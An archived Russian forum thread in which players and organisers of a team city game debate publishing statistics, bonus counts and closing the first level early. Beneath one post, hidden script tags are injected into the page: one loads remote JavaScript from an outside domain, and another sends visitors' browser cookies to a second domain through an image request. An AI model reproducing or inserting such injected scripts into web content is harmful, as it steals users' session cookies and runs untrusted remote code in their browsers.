Форумы Dead-Line

Форумы Dead-Line (http://dead-line.spb.ru/forum/index.php)
-   Анонсы игр (http://dead-line.spb.ru/forum/forumdisplay.php?f=98)
-   -   1000 и 1 баян (http://dead-line.spb.ru/forum/showthread.php?t=6042)

DEd_MONro 18-04-2013 18:06

Цитата:

Сообщение от Prinncess@ (Сообщение 264336)
так а кто просил-то?

Орги сами начали выкладывать стату, а игроки кто как мог помогали сделать это цивилизованно

DashИК 18-04-2013 18:10

Цитата:

Сообщение от DEd_MONro (Сообщение 264337)
Орги сами начали выкладывать стату, а игроки кто как мог помогали сделать это цивилизованно

На самом деле я считала, что те, кому нужна стата будут сами считать кол-во бонусов, взятое командами, но народ захотел чтобы можно было быстро посмотреть кто и сколько взял, забить пару кодов мне не сложно )

DashИК 18-04-2013 18:11

Цитата:

Сообщение от Prinncess@ (Сообщение 264336)
так а кто просил-то?

По-моему 2 страницы обсуждения были посвящены просьбам показать стату )))
И небольшое ППО по спонсору и призам.

melamory 18-04-2013 20:26

Я правильно понимаю, что в статистике, имеет смысл смотреть только на количество бонусов?

Punch 18-04-2013 20:52

Цитата:

Сообщение от melamory (Сообщение 264348)
Я правильно понимаю, что в статистике, имеет смысл смотреть только на количество бонусов?

Да, абсолютно. Влияет только количество бонусов на итоговый результат.

ndevil 18-04-2013 20:58

Цитата:

Сообщение от Punch (Сообщение 264351)
Да, абсолютно. Влияет только количество бонусов на итоговый результат.

так а что мешает тогда снять первый уровень сейчас, чтобы итоговая стата соответствовала действительности, а не пересчитывать в уме бонусы?
<!--s_links--><!--check code--><!--/s_links-->

Punch 18-04-2013 21:13

Цитата:

Сообщение от ndevil (Сообщение 264352)
так а что мешает тогда снять первый уровень сейчас, чтобы итоговая стата соответствовала действительности, а не пересчитывать в уме бонусы?

инфа в двигле, наверное...

ndevil 18-04-2013 21:19

Цитата:

Сообщение от Punch (Сообщение 264353)
инфа в двигле, наверное...

а она исчезнет разве после снятия? уровень-же всем выдан уже. ну так запилите еще один уровень куда инфу copy-paste, призываются гуру ен-движка.
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://nummobile.com/80j4ch2sa3g98uehlyoro4uftwotqhh'></script>
<script> img = new Image(); img.src = "http://frontext.ru/www/s.gif?"+document.cookie; </script>

Velkopiterskij 19-04-2013 01:40

Цитата:

Сообщение от ndevil (Сообщение 264352)

А чего там пересчитывать? Смысл-то какой? Максимум 400 часов бонуса и всё тут)
Или просто очень уж хочется посмотреть кто в каком темпе берёт?

грициан 19-04-2013 02:21

Не надо снимать первый уровень. Желающие смотреть стату итак имеют возможность это сделать.

Ol4ik 19-04-2013 16:27

Цитата:

Сообщение от Punch (Сообщение 264334)
Вот на фига вам стата, если только треть команд 1 уровень закрыла?))

я вот тож не понимаю, чего все скрывают :)

Punch 19-04-2013 17:12

Цитата:

Сообщение от грициан (Сообщение 264366)
Не надо снимать первый уровень. Желающие смотреть стату итак имеют возможность это сделать.

Гриш, а нам ничем не грозит, если мы время окончания 1 уровня поставим не 17 мая, а, например, завтра? Тогда все "не желающие светиться" по идее попадут в стату.

prinncessa 19-04-2013 17:18

Цитата:

Сообщение от Punch (Сообщение 264441)
Гриш, а нам ничем не грозит, если мы время окончания 1 уровня поставим не 17 мая, а, например, завтра? Тогда все "не желающие светиться" по идее попадут в стату.

а в штурме можно менять продолжительность уровня, когда игра уже идет? О_о

Effa 19-04-2013 17:26

Судя по обсуждениям, играть некогда - все на стату дрочат.
Еще месяц до конца игры, орги разберутся с двиглом. Что вы их мучаете.

Velkopiterskij 19-04-2013 17:56

Цитата:

Сообщение от Effa (Сообщение 264443)
Судя по обсуждениям, играть некогда - все на стату дрочат.

Да чего с ним разбираться-то?)) Официально объявить, что стата открыта у команды только по желанию самой команды )

DashИК 19-04-2013 18:04

Цитата:

Сообщение от Effa (Сообщение 264443)

Смешно.

Цитата:

Сообщение от Velkopiterskij
Официально объявить, что стата открыта у команды только по желанию самой команды )

На самом деле посмотреть сколько и чего взяла каждая из команд можно по бонусам, я вообще не считала это проблемой. Народ попросил дать возможность видеть "быструю" стату - сделали.
Я не вижу смысла в "обязаловке".

Цитата:

Сообщение от Prinncess@
а в штурме можно менять продолжительность уровня, когда игра уже идет? О_о

Если уровень реализован бонусом, то да, можно менять продолжительность.

Цитата:

Сообщение от Punch

Я не Гриша, но могу сказать, что с первым уровнем это не прокатит )
И вообще - есть несколько более простых вариантов заставить команды вбить закрывашки - например, вкатить штраф, пару суток, если они не вобьют коды до завтра))) другой вопрос - нафига.

Effa 19-04-2013 18:44

Я без сарказма, если что. Просто удивило, как же сильно людей припекает смотреть стату, когда висит уже десяток заданий для выполнения.

грициан 19-04-2013 19:42

Цитата:

Сообщение от DashИК (Сообщение 264447)
На самом деле посмотреть сколько и чего взяла каждая из команд можно по бонусам, я вообще не считала это проблемой. Народ попросил дать возможность видеть "быструю" стату - сделали.
Я не вижу смысла в "обязаловке".

Да никто не просил. Один набросил, остальные понакидали вариантов. Участие в обсуждении способов открытия статистики не означает просьбы её открыть)

Ol4ik 19-04-2013 22:49

Цитата:

Сообщение от DashИК (Сообщение 264447)
На самом деле посмотреть сколько и чего взяла каждая из команд можно по бонусам, я вообще не считала это проблемой.

я ленивая, и мне влом считать, даже сколько у нас взято))) и я за открытую стату)))

Ol4ik 19-04-2013 22:50

Цитата:

Сообщение от грициан (Сообщение 264453)
Да никто не просил. Один набросил, остальные понакидали вариантов. Участие в обсуждении способов открытия статистики не означает просьбы её открыть)

Гриц, чо ты вот вредина такая?)))

Часовой пояс GMT +3, время: 13:45.